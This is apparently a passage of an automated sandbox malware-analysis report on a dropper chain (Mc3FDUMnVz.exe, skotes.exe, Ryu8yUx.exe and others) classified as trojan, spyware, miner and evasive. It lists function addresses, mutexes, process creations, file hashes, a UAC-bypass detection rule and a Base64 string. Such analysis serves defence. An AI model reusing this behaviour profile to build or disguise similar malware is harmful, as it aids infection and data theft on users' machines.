                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001E6C6F3_1_001E6C6F
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_002700F73_1_002700F7
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001B7F3B3_1_001B7F3B
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001FCB8F3_1_001FCB8F
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 12_2_01891EF012_2_01891EF0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 12_2_01891BEF12_2_01891BEF
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 12_2_01891C0012_2_01891C00
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 12_2_01891EE012_2_01891EE0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0042C0C013_2_0042C0C0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004380CD13_2_004380CD
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004258B013_2_004258B0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0043E15013_2_0043E150
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0041215913_2_00412159
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004321AB13_2_004321AB
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0040BA6013_2_0040BA60
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00419A0013_2_00419A00
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0044622013_2_00446220
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0044131013_2_00441310
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004293EE13_2_004293EE
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0043DE0013_2_0043DE00
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004456F013_2_004456F0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004436B913_2_004436B9
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0040104013_2_00401040
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0041084513_2_00410845
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0042284513_2_00422845
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0041005013_2_00410050
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0040E83013_2_0040E830
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0041283013_2_00412830
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0042D83113_2_0042D831
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0043B8D213_2_0043B8D2
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004378E713_2_004378E7
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004278B413_2_004278B4
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0041A8BA13_2_0041A8BA
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0043C0BF13_2_0043C0BF
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0042615013_2_00426150
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0043696013_2_00436960
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0042997013_2_00429970
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0042B17513_2_0042B175
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0041F10013_2_0041F100
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0040C92013_2_0040C920
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0043393013_2_00433930
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0040B98013_2_0040B980
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00408A4013_2_00408A40
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0040A24013_2_0040A240
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0042026A13_2_0042026A
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004452C013_2_004452C0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00402AD013_2_00402AD0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004152F413_2_004152F4
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00435A8613_2_00435A86
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00415A8F13_2_00415A8F
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00432A8D13_2_00432A8D
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00421A9013_2_00421A90
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00423AB013_2_00423AB0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00420AB013_2_00420AB0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0043DAB013_2_0043DAB0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0043EB4013_2_0043EB40
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0042135013_2_00421350
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00438B0013_2_00438B00
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00445B0013_2_00445B00
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00432B2C13_2_00432B2C
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0040E38013_2_0040E380
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00412B9013_2_00412B90
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00441BA013_2_00441BA0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00444C4013_2_00444C40
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0040946013_2_00409460
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00418C2013_2_00418C20
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0040C4C013_2_0040C4C0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0042C4D013_2_0042C4D0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004424D013_2_004424D0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004324E113_2_004324E1
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004034F013_2_004034F0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0042C4F013_2_0042C4F0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0041BCF613_2_0041BCF6
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0042B4B013_2_0042B4B0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0040B54013_2_0040B540
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0042ED4413_2_0042ED44
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00444D5013_2_00444D50
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00444D6913_2_00444D69
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0043D57013_2_0043D570
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0041B50013_2_0041B500
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00407D2013_2_00407D20
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00442D3C13_2_00442D3C
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0042E53D13_2_0042E53D
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004385C713_2_004385C7
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004205BB13_2_004205BB
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0043F64E13_2_0043F64E
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0042665013_2_00426650
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00444C4013_2_00444C40
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0041FE5813_2_0041FE58
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00415E7013_2_00415E70
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00445E7013_2_00445E70
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00444E7013_2_00444E70
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0044462513_2_00444625
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0043CE2113_2_0043CE21
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0043EE2013_2_0043EE20
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0041DEF013_2_0041DEF0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0042168013_2_00421680
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00403E9013_2_00403E90
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00421EA013_2_00421EA0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00434EAB13_2_00434EAB
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00408EB013_2_00408EB0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0042DF6613_2_0042DF66
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0041A76613_2_0041A766
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0040477213_2_00404772
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00444F2013_2_00444F20
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0043D7D013_2_0043D7D0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0041AFF713_2_0041AFF7
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0041BF8A13_2_0041BF8A
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00424F9013_2_00424F90
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00444FB013_2_00444FB0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00429FBD13_2_00429FBD
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FF887BB501029_2_00007FF887BB5010
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FF887BE4DFB31_2_00007FF887BE4DFB
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Ryu8yUx[1].exe 991515CEFB9B7C2112EAC6558F98E2EC5892F01AA93E49218F6D9C1C7FC28022
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\kUHbhqh[1].exe AA63CF25CFC47E6A53DC1B286E425FAA8775AC0311C47CA6C59D1950CFA03251
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: String function: 00418C10 appears 87 times
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: String function: 0040B230 appears 43 times
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 924
                              Source: Stamp_Setup.exe.11.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                              Source: Stamp_Setup.tmp.23.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                              Source: Stamp_Setup.tmp.23.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                              Source: Stamp_Setup.tmp.25.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                              Source: Stamp_Setup.tmp.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                              Source: is-6JNF1.tmp.26.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                              Source: is-6JNF1.tmp.26.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                              Source: kUHbhqh.exe.7.drStatic PE information: Number of sections : 11 > 10
                              Source: kUHbhqh[1].exe.7.drStatic PE information: Number of sections : 11 > 10
                              Source: is-DKJ0H.tmp.26.drStatic PE information: Number of sections : 12 > 10
                              Source: Mc3FDUMnVz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 10.2.Fe36XBk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: Mc3FDUMnVz.exeStatic PE information: Section: shlcppqz ZLIB complexity 0.9942111841605951
                              Source: skotes.exe.0.drStatic PE information: Section: shlcppqz ZLIB complexity 0.9942111841605951
                              Source: Ryu8yUx[1].exe.7.drStatic PE information: Section: .rdata ZLIB complexity 1.0003345630787037
                              Source: Ryu8yUx.exe.7.drStatic PE information: Section: .rdata ZLIB complexity 1.0003345630787037
                              Source: Fe36XBk[1].exe.7.drStatic PE information: Section: ZLIB complexity 0.9960719138198758
                              Source: Fe36XBk[1].exe.7.drStatic PE information: Section: apuhhdvg ZLIB complexity 0.994313635778399
                              Source: Fe36XBk.exe.7.drStatic PE information: Section: ZLIB complexity 0.9960719138198758
                              Source: Fe36XBk.exe.7.drStatic PE information: Section: apuhhdvg ZLIB complexity 0.994313635778399
                              Source: Ryu8yUx[1].exe.7.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                              Source: Ryu8yUx[1].exe.7.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                              Source: Ryu8yUx.exe.7.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                              Source: Ryu8yUx.exe.7.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                              Source: 12.2.Ryu8yUx.exe.45b9550.0.raw.unpack, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                              Source: 12.2.Ryu8yUx.exe.45b9550.0.raw.unpack, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                              Source: Ryu8yUx[1].exe.7.dr, Program.csBase64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
                              Source: Ryu8yUx.exe.7.dr, Program.csBase64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
                              Source: 12.2.Ryu8yUx.exe.45b9550.0.raw.unpack, Program.csBase64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
                              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.mine.winEXE@51/45@5/8
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_0043E150 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,13_2_0043E150
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Fe36XBk[1].exeJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeMutant created: \Sessions\1\BaseNamedObjects\94a5dd291cdb
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3648:120:WilError_03
                              Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\1b62a0821db7b004b282c4b72343cd7a
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeMutant created: \Sessions\1\BaseNamedObjects\MVHEBzjxKloGkPj
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeMutant created: \Sessions\1\BaseNamedObjects\StrangeRod
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5876:120:WilError_03
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7512
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5884:120:WilError_03
                              Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\IntriguedLeopard
                              Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\2f4cb03984c191cc482337
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\JeDkUsy6Fzs0.bat" "
                              Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                              Source: Mc3FDUMnVz.exeVirustotal: Detection: 46%
                              Source: Mc3FDUMnVz.exeReversingLabs: Detection: 57%
                              Source: Mc3FDUMnVz.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: Fe36XBk.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeFile read: C:\Users\user\Desktop\Mc3FDUMnVz.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\Mc3FDUMnVz.exe "C:\Users\user\Desktop\Mc3FDUMnVz.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe "C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe "C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe "C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess created: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe "C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 924
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\JeDkUsy6Fzs0.bat" "
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
